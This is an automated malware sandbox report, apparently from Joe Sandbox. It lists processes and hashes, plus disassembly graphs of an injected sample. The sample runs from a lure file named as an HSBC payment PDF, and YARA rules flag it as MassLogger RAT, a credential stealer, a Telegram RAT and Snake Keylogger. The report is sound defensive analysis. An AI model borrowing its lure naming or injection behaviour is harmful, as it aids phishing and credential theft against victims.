                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:03:26:09
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'512'448 bytes
                                                                                                                                                                              MD5 hash:E7E89E8BD2CB902CA372DA1022670BE2
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:03:26:10
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\msdtc.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\msdtc.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'434'112 bytes
                                                                                                                                                                              MD5 hash:AAA284FF086F56BEC322CDE13CE5989C
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:03:26:10
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'391'616 bytes
                                                                                                                                                                              MD5 hash:F3D51ACFF199999586D8F7FCE77371CB
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:03:26:11
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\perfhost.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\SysWow64\perfhost.exe
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              File size:1'306'624 bytes
                                                                                                                                                                              MD5 hash:A01D0D18438CEA05470B157B11E94B3F
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:03:26:11
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\Locator.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\locator.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'296'896 bytes
                                                                                                                                                                              MD5 hash:27C76B862642ACB46AB7DEFBFD73BFA7
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:03:26:11
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                                                                              Imagebase:0xfd0000
                                                                                                                                                                              File size:45'984 bytes
                                                                                                                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3380159600.000000000347B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000011.00000002.3338405764.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                              • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000011.00000002.3380159600.000000000337F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:18
                                                                                                                                                                              Start time:03:26:12
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\snmptrap.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'302'528 bytes
                                                                                                                                                                              MD5 hash:C3DD833FAFF8B6217772A5E66FF25F25
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:19
                                                                                                                                                                              Start time:03:26:13
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'455'616 bytes
                                                                                                                                                                              MD5 hash:72181D2F9FF55560F9C4B3AB19C98A62
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:21
                                                                                                                                                                              Start time:03:26:13
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'667'072 bytes
                                                                                                                                                                              MD5 hash:2DAADB2D9EE99D7F3C6EB0FA254025A1
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:22
                                                                                                                                                                              Start time:03:26:14
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'611'264 bytes
                                                                                                                                                                              MD5 hash:5E4593411714FE016FDCC665AFE5D552
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:23
                                                                                                                                                                              Start time:03:26:15
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'801'216 bytes
                                                                                                                                                                              MD5 hash:8311FBEB6995BA81570173720F2B188B
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:24
                                                                                                                                                                              Start time:03:26:15
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\vds.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:1'303'552 bytes
                                                                                                                                                                              MD5 hash:D2428B28D20D38757D35F80B6491A864
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:26
                                                                                                                                                                              Start time:03:26:17
                                                                                                                                                                              Start date:11/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\wbengine.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\system32\wbengine.exe"
                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                              File size:2'164'736 bytes
                                                                                                                                                                              MD5 hash:7FEABE370E82D30A720E4A9459EFC1EB
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.2%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:53
                                                                                                                                                                                Total number of Limit Nodes:4
                                                                                                                                                                                execution_graph 3866 7483e7 3869 7481e5 3866->3869 3867 74830b CloseHandle 3867->3869 3868 748212 GetTokenInformation 3868->3869 3869->3867 3869->3868 3870 748357 GetTokenInformation 3869->3870 3871 7481f7 3869->3871 3870->3869 3872 745d50 CreateThread 3876 745bbc 3872->3876 3873 745cd4 CreateThread CloseHandle 3873->3876 3874 745c2c 3875 745d56 CreateThread 3875->3876 3876->3872 3876->3873 3876->3874 3876->3875 3917 745d22 3918 745cd4 CreateThread CloseHandle 3917->3918 3921 745bbc 3917->3921 3918->3921 3919 745c2c 3920 745d56 CreateThread 3920->3921 3921->3918 3921->3919 3921->3920 3922 745d50 CreateThread 3921->3922 3922->3921 3941 7481e3 3944 7481e5 3941->3944 3942 748357 GetTokenInformation 3942->3944 3943 74830b CloseHandle 3943->3944 3944->3942 3944->3943 3945 7481f7 3944->3945 3946 748212 GetTokenInformation 3944->3946 3946->3944 3947 7458de 3948 7553f0 VirtualAlloc 3947->3948 3949 7458f9 3948->3949 3950 7481c0 3 API calls 3949->3950 3951 745907 3950->3951 3877 745b8f 3890 7553f0 3877->3890 3879 745baf 3895 7481c0 3879->3895 3881 745c2c 3882 745c85 3901 745990 3882->3901 3884 745dcd 3884->3884 3885 745c20 3885->3881 3885->3882 3886 745bbc 3885->3886 3886->3881 3887 745cd4 CreateThread CloseHandle 3886->3887 3888 745d56 CreateThread 3886->3888 3889 745d50 CreateThread 3886->3889 3887->3886 3888->3886 3889->3886 3891 7553f4 3890->3891 3892 75545e VirtualAlloc 3891->3892 3894 7553f6 3891->3894 3893 755460 3892->3893 3893->3891 3894->3879 3898 7481e5 3895->3898 3896 748357 GetTokenInformation 3896->3898 3897 74830b CloseHandle 3897->3898 3898->3885 3898->3896 3898->3897 3899 748212 GetTokenInformation 3898->3899 3900 7481f7 3898->3900 3899->3898 3900->3885 3903 745994 wcscpy 3901->3903 3902 745a23 3902->3884 3903->3902 3904 745a8d VirtualAlloc 3903->3904 3904->3903

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 00745346 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 726 745346-745359 727 7454cf 726->727 728 74535f 726->728 729 745335 727->729 730 7454d5 727->730 731 745361 728->731 732 745363 728->732 734 7453ef-7453f8 729->734 730->729 733 7454db 730->733 731->732 735 745369-74536d 732->735 736 7454ab-7454b9 732->736 738 7454dc-7454dd 733->738 739 745377 734->739 735->736 743 745373 735->743 737 7454bb 736->737 741 7454e2 737->741 742 7454bd-7454c3 737->742 744 74531e-74547b 739->744 745 745379-74543f 739->745 750 780cf5-780d02 741->750 742->738 743->739 755 745481 744->755 756 745309-745313 744->756 748 745445 745->748 749 7453a9-745419 745->749 748->749 751 74544b-74544f 748->751 749->742 757 74541f 749->757 758 7453a4 751->758 755->756 761 745487 755->761 759 745315-7453ed 756->759 760 7452f2-745408 756->760 757->744 763 7453a6 758->763 764 74538d 758->764 759->734 769 74540e-745461 760->769 770 74532f-745344 760->770 771 74548e-74549f 761->771 763->764 768 7453a7-7453a8 763->768 766 7453c2-7453cb 764->766 767 74538f-7453a3 764->767 766->741 773 7453d1 766->773 767->758 768->750 769->742 775 745463 769->775 771->737 778 745471 773->778 779 7452fe 773->779 775->770 777 745469 775->777 777->770 781 74546f 777->781 778->771 779->778 780 745304-74538b 779->780 780->764 781->778
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                • Instruction ID: e1031d5fe19552e227dd6214edd315e3fc7bcf707d2bbe50b1b7f46eec06dca6
                                                                                                                                                                                • Opcode Fuzzy Hash: 908c24f0ecee5e6f2dddf1d8173b17ebe70cd201337ab44e3e024085c5e0ca95
                                                                                                                                                                                • Instruction Fuzzy Hash: 57412A5250DED18FC7268A2C58643B06B909B223EAF5901D7E4C3CF0E3E39C4C94A327
                                                                                                                                                                                Function 007481C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 7481c0-7481d8 1 7481e5 0->1 2 7483bf-7483ca 0->2 3 7482a3-7482a5 1->3 4 7481eb 1->4 10 748277-74827a 2->10 11 7483d0 2->11 6 7483f9 3->6 7 7482ab 3->7 8 7481f1 4->8 9 7482b2-7482bc 4->9 16 7482d2-7482d7 6->16 17 7483ff 6->17 7->6 12 7482b1 7->12 8->9 15 7481f7-74828e 8->15 13 7482c5-7482c8 9->13 14 748357-74836f GetTokenInformation 9->14 21 748241 10->21 22 74827c 10->22 11->10 19 7483d6 11->19 12->9 13->6 20 7482ce 13->20 31 748376-74837b 14->31 18 748306-748309 16->18 24 74f524-74f52e 17->24 25 74832e-748330 18->25 26 74830b-748311 CloseHandle 18->26 27 7483d7-7483dd 19->27 28 7482d0 20->28 29 74828f-748303 call 7772ec 20->29 21->31 32 748251-748256 call 7772f4 21->32 22->21 30 74827e 22->30 33 74f807 24->33 40 748332 25->40 41 7482dd-7482e3 25->41 26->25 27->6 28->16 28->29 29->18 61 74834f-748355 29->61 30->26 37 748284 30->37 38 7482f0-74831c 31->38 39 748381 31->39 51 74825b-748260 32->51 35 74f80d 33->35 36 74f8df-74f8e0 33->36 35->36 44 74f813 35->44 56 7515a5-7515aa 36->56 37->25 38->1 65 748322 38->65 39->38 48 748387 39->48 40->41 50 748334 40->50 46 7483a3-7483a4 41->46 47 7482e9 41->47 57 74f78f 44->57 58 74f81b 44->58 46->24 47->46 55 7482ef 47->55 48->10 52 748390-748393 48->52 50->24 51->52 52->30 60 748399 52->60 55->38 62 7515ae-7515af 56->62 57->58 64 74f795 57->64 58->36 60->30 66 74839f-7483a1 60->66 69 748341 61->69 70 748212-74821a GetTokenInformation 61->70 63 7515b2-7515b7 62->63 68 7515ba-7515c1 63->68 64->33 65->1 71 748328-74832c 65->71 66->46 72 7515c7-7515d2 68->72 73 751750-7517a2 call 7772f4 68->73 69->70 74 748347 69->74 75 748220-748234 70->75 76 7483af 70->76 71->13 71->25 79 7515d4-7515d6 72->79 80 751620-751623 72->80 81 74834d 74->81 82 751638-751640 74->82 75->27 106 74823a 75->106 76->32 77 7483b5 76->77 77->32 84 7483bb-7483bd 77->84 86 751670-751684 79->86 87 7515dc-7515df 79->87 88 751625-751628 80->88 89 7516a0-7516b4 80->89 81->61 90 751646-75165f 82->90 91 75170e-751727 82->91 84->2 86->56 99 75168a-75168d 86->99 87->68 94 7515e1-7515f6 87->94 88->68 96 75162a-751636 88->96 92 7516f4-7516f5 89->92 93 7516b6-7516b9 89->93 90->72 98 751665 90->98 91->72 97 75172d 91->97 110 7516fe-75170c 92->110 102 7516bb 93->102 103 75173a-75173b 93->103 104 7516d2-7516d7 94->104 105 7515fc-751600 94->105 96->82 107 7516dc-7516ec 96->107 97->73 98->73 100 751693-751697 99->100 101 75172f-751738 99->101 108 7516bf-7516cd 100->108 113 75173f-751740 101->113 102->108 103->113 104->62 109 751606-751618 105->109 105->110 106->27 112 748240 106->112 107->72 111 7516f2 107->111 109->63 114 751744-751748 110->114 111->73 115 75b32e-75b330 112->115 113->114 116 75b300 115->116 117 75b332-75b337 call 7772f4 115->117 121 75b302 116->121 122 75b2fd 116->122 117->116 123 75b339 117->123 124 75b305 122->124 125 75b2ff 122->125 123->116 126 75b33b-75b33f 123->126 127 75b322-75b32d 124->127 128 75b308-75b315 124->128 125->128 126->128 127->115 128->124 130 75b317 128->130 130->122
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                • Instruction ID: e0f972ea86c65c5f3b3e7f08fd8fbeb6e0701ca9383a63031a1680a45b94bc3d
                                                                                                                                                                                • Opcode Fuzzy Hash: 1cefe6a1d073a468b2f47e60a6f5afefe70bf264b610db135861494dc24b89b7
                                                                                                                                                                                • Instruction Fuzzy Hash: 6CB1F53050CA4D8BDB69CF1C84802BDB7A1FF95316F688259D89B87166EFAC9C06D353
                                                                                                                                                                                Function 00745B8F Relevance: 4.7, APIs: 3, Instructions: 161threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 131 745b8f-745c20 call 7553f0 call 778358 call 760320 call 7481c0 141 745cf4-745d08 call 7772ec 131->141 142 745c26 131->142 146 745c87-745dc8 call 745e60 call 745990 141->146 147 745d0e 141->147 142->141 143 745c2c-745c2f 142->143 161 745dcd 146->161 147->146 149 745d14-745d18 147->149 153 745c65 149->153 154 745daf-745db6 call 7452d0 149->154 157 745c67 153->157 158 745ca3 call 745df0 153->158 163 745c30-745c39 154->163 164 745dbc 154->164 157->158 162 745c69-745c72 157->162 173 745c45-745d6d call 761520 158->173 161->161 166 745c97-745c9d 162->166 167 745c78 162->167 187 745bf7 163->187 188 745cb9-745cbd 163->188 170 745d7d-745d89 164->170 171 745dbe 164->171 181 745c85 166->181 182 745c9f 166->182 168 745c7e 167->168 169 745d1f-745d45 167->169 168->169 175 745c84-745d5b CreateThread 168->175 189 745cd4-745cea CreateThread CloseHandle 169->189 190 745d47 169->190 183 745d94 170->183 184 745d8b-745d92 170->184 171->170 186 745d9b 171->186 198 745bfd-745c06 173->198 201 745d73 173->201 175->167 181->146 182->181 193 745ca1 182->193 183->143 199 745cb3 183->199 184->183 195 745d9c 184->195 186->195 187->188 187->198 191 745d56-745d5b CreateThread 188->191 192 745cc3 188->192 189->184 202 745cf0-745d4d 189->202 190->189 191->167 192->191 200 745cc9 192->200 193->158 206 745da5-745da8 195->206 198->206 199->143 199->188 200->191 201->198 204 745d79-745d7b 201->204 202->183 204->170 206->154
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction ID: 3f449fd5eb5a89fa093c52e680b9c6f15d11c346f3560881881bf74a59727703
                                                                                                                                                                                • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                • Instruction Fuzzy Hash: FB41C521B18F0A8FDB68973898DD73936D1EF59310F5805AAD41BCB1A3DB6C8C05CB62
                                                                                                                                                                                Function 00745D22 Relevance: 4.5, APIs: 3, Instructions: 42threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 208 745d22-745d45 209 745cd4-745cea CreateThread CloseHandle 208->209 210 745d47 208->210 211 745cf0-745d4d 209->211 212 745d8b-745d92 209->212 210->209 215 745d94 211->215 212->215 216 745d9c 212->216 218 745cb3 215->218 219 745c2c-745c2f 215->219 220 745da5-745db6 call 7452d0 216->220 218->219 221 745cb9-745cbd 218->221 231 745c30-745c39 220->231 232 745dbc 220->232 223 745d56-745d5b CreateThread 221->223 224 745cc3 221->224 227 745c78 223->227 224->223 226 745cc9 224->226 226->223 229 745c7e 227->229 230 745d1f-745d45 227->230 229->230 233 745c84-745d5b CreateThread 229->233 230->209 230->210 231->221 243 745bf7 231->243 235 745d7d-745d89 232->235 236 745dbe 232->236 233->227 235->212 235->215 236->235 242 745d9b 236->242 242->216 243->221 244 745bfd-745c06 243->244 244->220
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction ID: a992006c35e504fe0ee78df37e984d30476cb127c70fbbddb4e8d9b0552c0fdb
                                                                                                                                                                                • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                • Instruction Fuzzy Hash: B0F0F620F1CE0B87DB2C87388CD933A62C1AF99361F650B1ED027C90E3DB2C49059A15
                                                                                                                                                                                Function 00745D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 246 745d50-745d5b CreateThread 247 745c78 246->247 248 745c7e 247->248 249 745d1f-745d45 247->249 248->249 250 745c84 248->250 252 745cd4-745cea CreateThread CloseHandle 249->252 253 745d47 249->253 250->246 254 745cf0-745d4d 252->254 255 745d8b-745d92 252->255 253->252 258 745d94 254->258 255->258 259 745d9c 255->259 261 745cb3 258->261 262 745c2c-745c2f 258->262 263 745da5-745db6 call 7452d0 259->263 261->262 264 745cb9-745cbd 261->264 271 745c30-745c39 263->271 272 745dbc 263->272 266 745d56-745d5b CreateThread 264->266 267 745cc3 264->267 266->247 267->266 269 745cc9 267->269 269->266 271->264 280 745bf7 271->280 273 745d7d-745d89 272->273 274 745dbe 272->274 273->255 273->258 274->273 279 745d9b 274->279 279->259 280->264 281 745bfd-745c06 280->281 281->263
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_740000_AppVClient.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread$CloseHandle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 738052048-0
                                                                                                                                                                                • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction ID: 8bfcde08ac16ae41e15e73084c44a17a80bfa06526b9cfbbbd12092e997ff8d8
                                                                                                                                                                                • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                • Instruction Fuzzy Hash: B4B01200A28F8B87012D173004C812806802E46638A741F6DDF73078E3DB0C0C046B30
                                                                                                                                                                                Function 00745990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 283 745990-74599b 285 7459a1 283->285 286 745a33-745a61 call 779b00 283->286 285->286 287 7459a7-7459ab 285->287 296 745ab4-745aba call 761080 286->296 297 745a63 286->297 292 7459b1-7459f3 call 772320 287->292 293 745a59 287->293 292->293 314 7459f5-7459fa 292->314 294 745a25-745a2d 293->294 295 745a5b 293->295 303 745a70-745a7b 294->303 304 745a2f 294->304 295->294 306 745a23 295->306 315 745a83-745a88 call 745df0 296->315 316 745a13 296->316 297->296 301 745a65 297->301 301->303 307 745a16-745a1e call 761470 303->307 308 745a7d 303->308 304->301 312 745a24 306->312 322 745a96-745ac2 307->322 308->307 313 745a7f-745a81 308->313 313->315 318 745a51-745a54 call 77233c 314->318 319 7459fc 314->319 325 745a8d VirtualAlloc 315->325 316->315 321 745a15 316->321 318->293 319->318 324 7459fe-745a02 319->324 321->307 322->312 327 745ac8 322->327 324->318 325->322 327->312 328 745ace 327->328 328->286
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.2110323928.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
